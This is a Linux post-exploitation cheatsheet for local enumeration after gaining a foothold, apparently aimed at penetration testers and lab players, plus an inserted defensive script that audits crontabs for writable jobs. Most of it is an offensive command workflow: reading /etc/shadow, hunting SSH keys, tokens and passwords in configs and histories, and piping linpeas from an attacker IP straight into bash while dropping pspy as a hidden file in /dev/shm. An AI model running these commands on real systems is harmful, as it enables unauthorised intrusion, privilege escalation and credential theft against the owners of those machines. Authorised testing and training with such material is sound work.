Local Enum
First moves after foothold. Manual triage in the first 60 seconds, then automated tools. Privesc-specific surface lives in 06-11.
i. The first 60 seconds
Type these one after the other, scan the output:
id
whoami
hostname
uname -a
cat /etc/os-release
cat /etc/issue
sudo -n -l ## NOPASSWD check, fails silently if password needed
sudo -l 2>/dev/null ## what can I run as sudo
What to do with the output:
- id shows extra groups (docker, lxd, disk, video, adm) -> instant privesc paths, see 06 PrivEsc - SUID & Sudo
- sudo -l shows ANY allowed command -> check GTFOBins
- uname -a gives kernel version -> 10 PrivEsc - Kernel & Exploits candidates
ii. Process and network state
ps faux ## full process tree with args
ps -ef --forest
ss -tlnp ## listening TCP with process
ss -ulnp ## listening UDP
ss -tnp ## established TCP
netstat -tlnp 2>/dev/null ## fallback if ss missing
Look at processes running as root that you can touch:
ps -eo user,pid,comm | awk '$1=="root"' | sort -u
Internal services (listening on 127.0.0.1) are interesting, they bypass external firewall:
ss -tlnp | grep '127.0.0.1\|::1'
iii. Network and routing
ip a
ip r
arp -a
cat /etc/hosts
cat /etc/resolv.conf
Other hosts the box talks to:
last -i | head
who -a
cat /etc/hosts.allow /etc/hosts.deny 2>/dev/null
iv. Users and groups
cat /etc/passwd | grep -v 'nologin\|false'
cat /etc/group
ls -la /home
getent passwd | awk -F: '$3 >= 1000 {print $1}' ## real users only
Can you read /etc/shadow? Game over if yes:
ls -la /etc/shadow /etc/shadow-
cat /etc/shadow 2>/dev/null
v. Sudo and SUID surface (quick scan)
Full treatment in 06 PrivEsc - SUID & Sudo; quick check now:
sudo -l 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null ## SGID
getcap -r / 2>/dev/null ## capabilities, see [08 PrivEsc - Capabilities](https://jinpwn.dev/cheatsheets/linux-pentesting/08-privesc---capabilities/)
vi. Cron and scheduled tasks
cat /etc/crontab
ls -la /etc/cron.d/ /etc/cron.hourly/ /etc/cron.daily/ /etc/cron.weekly/ /etc/cron.monthly/
crontab -l 2>/dev/null
cat /var/spool/cron/crontabs/* 2>/dev/null
systemctl list-timers --all
Look for cron jobs running scripts you can write to. See 07 PrivEsc - Cron & Timers.
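The "script you can write to" check above, written out as a small POSIX sh audit helper (added here, not part of the cheatsheet): it parses a system-crontab-formatted file, resolves each job's program file (looking through a leading sh/bash), and reports files not owned by the job's user, files with a group/other write bit, and relative program paths. The function names, the RISK output format and the sample crontab are all constructed for this example.

```shell
# Added audit helper, not from the cheatsheet. Reads a system-crontab-formatted
# file (m h dom mon dow USER COMMAND) and reports jobs whose program file is
# not owned by the job's user or has a group/other write bit (the "script you
# can write to" case above), plus relative program paths (cron's PATH is short).
# Not checked: parent-directory permissions and "sh -c '...'" bodies.

# is_locked_down PATH USER -> 0 if PATH is owned by USER with no g/o write bit
is_locked_down() {
    want=$2
    set -- $(ls -ld "$1" 2>/dev/null)              # perms links owner group ...
    [ -n "$3" ] && [ "$3" = "$want" ] || return 1
    case "$1" in ?????w*|????????w*) return 1 ;; esac   # group w / other w set
}

# audit_crontab FILE -> prints one RISK line per finding, returns the count
audit_crontab() {
    file=$1 findings=0
    while IFS= read -r line; do
        case "$line" in ''|'#'*|[A-Za-z_]*=*) continue ;; esac   # blank, comment, VAR=
        set -f; set -- $line; set +f                 # -f: don't glob the '*' fields
        case "$1" in @*) skip=1 ;; *) skip=5 ;; esac # @reboot etc. vs 5 time fields
        [ $# -gt $((skip + 1)) ] || continue
        shift $skip; user=$1 prog=$2
        case "$prog" in sh|bash|*/sh|*/bash)         # interpreter: audit its script
            case "$3" in ''|-*) ;; *) prog=$3 ;; esac ;;
        esac
        case "$prog" in
            /*) is_locked_down "$prog" "$user" && continue
                echo "RISK writable-or-wrong-owner user=$user $prog" ;;
            *)  echo "RISK relative-path user=$user $prog" ;;
        esac
        findings=$((findings + 1))
    done < "$file"
    return $findings
}

# demo: constructed sample with one group-writable script and one relative
# path; returns the finding count (expected 2)
demo() {
    d=$(mktemp -d); me=$(id -un)
    printf '#!/bin/sh\n' > "$d/good.sh"; chmod 755 "$d/good.sh"
    printf '#!/bin/sh\n' > "$d/bad.sh";  chmod 775 "$d/bad.sh"
    printf '%s\n' "SHELL=/bin/sh" "# m h dom mon dow user command" \
        "*/5 * * * * $me $d/good.sh" "0 3 * * * $me /bin/sh $d/bad.sh" \
        "@reboot $me cleanup.sh" > "$d/crontab"
    n=0; audit_crontab "$d/crontab" || n=$?
    rm -rf "$d"; return $n
}

demo || echo "findings: $?"
```

Point it at /etc/crontab or a file from /etc/cron.d/ to audit a real host; the demo uses the current user as the job owner only because it creates the sample files itself.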
vii. Writable files and directories
Files owned by root but writable by you (or your group):
find / -writable -type f 2>/dev/null | grep -v "/proc\|/sys" | head -50
find / -writable -type d 2>/dev/null | grep -v "/proc\|/sys" | head -30
## Anything in /etc that's writable is gold:
find /etc -writable -type f 2>/dev/null
World-writable files in suspicious places:
find / -perm -o+w -type f 2>/dev/null | grep -v "/proc\|/sys" | head -30
viii. Interesting file content
SSH keys lying around:
find / -name 'id_rsa*' -o -name 'id_ed25519*' -o -name 'authorized_keys' 2>/dev/null
find / -name '*.pem' -o -name '*.key' 2>/dev/null | grep -v "/proc\|/sys"
Config files often have creds:
find / \( -name '*.conf' -o -name '*.config' -o -name '*.ini' -o -name '.env' \) 2>/dev/null | xargs grep -lEi 'pass|secret|api|token' 2>/dev/null
Bash history of other users (if readable):
find / -name '.bash_history' -readable 2>/dev/null
find /home -name '.*history' -readable 2>/dev/null
Mail spool, often forgotten:
ls -la /var/mail /var/spool/mail 2>/dev/null
cat /var/mail/root 2>/dev/null
Backup files anywhere:
find / \( -name '*.bak' -o -name '*.backup' -o -name '*.old' -o -name '*.swp' \) 2>/dev/null | head
Git repos with old commits leaking creds:
find / -name '.git' -type d 2>/dev/null
## In any found .git:
git log --all --full-history -- '*pass*' '*cred*' '*.env'
ix. Mount points and filesystems
mount
cat /etc/fstab
df -h
lsblk
Look for NFS shares, unusual mounts, /dev/shm size (RAM-backed scratch space):
mount | grep -E 'nfs|cifs|fuse|tmpfs'
x. Environment and startup
env
cat ~/.bashrc ~/.profile ~/.bash_profile 2>/dev/null
cat /etc/profile /etc/bash.bashrc 2>/dev/null
ls -la /etc/profile.d/
ls -la /etc/init.d/ /etc/systemd/system/
xi. Run linpeas
Now run automated triage. Pipe from memory, no disk write:
curl -s http://10.10.14.1/linpeas.sh | bash
## or save the output:
curl -s http://10.10.14.1/linpeas.sh | bash | tee /dev/shm/.lp.out
Read the output by severity:
- Red-yellow text = 95% chance of privesc, look here first
- Yellow text = interesting, check manually
- Skip the green stuff on the first pass
Quick filter on the output file:
grep -a "95%" /dev/shm/.lp.out
grep -a -E "RED|YELLOW" /dev/shm/.lp.out
xii. pspy for cron and process spying
linpeas catches static stuff. pspy catches things that happen over time, like cron jobs running as root:
curl -s -o /dev/shm/.p http://10.10.14.1/pspy64
chmod +x /dev/shm/.p
/dev/shm/.p -pf -i 1000 ## watch for new processes
## leave it running 5+ minutes, every cron job will show
If linpeas finds nothing and the box theme suggests automation, the privesc is almost always a timed job. pspy is how you find it without guessing.
xiii. Quick triage checklist
Before opening any privesc file, confirm you’ve checked:
- sudo -l output
- SUID binaries list
- Capabilities (getcap -r /)
- Cron jobs and systemd timers
- Writable files in /etc and /opt
- Processes running as root
- Internal listening ports (127.0.0.1)
- Mounted filesystems and exports
- User home dirs you can read (especially /home/*/.ssh)
- Linpeas red-yellow output
- pspy ran for at least 5 minutes
Then work 06 PrivEsc - SUID & Sudo -> 07 PrivEsc - Cron & Timers -> 08 PrivEsc - Capabilities in that order. Kernel exploits last.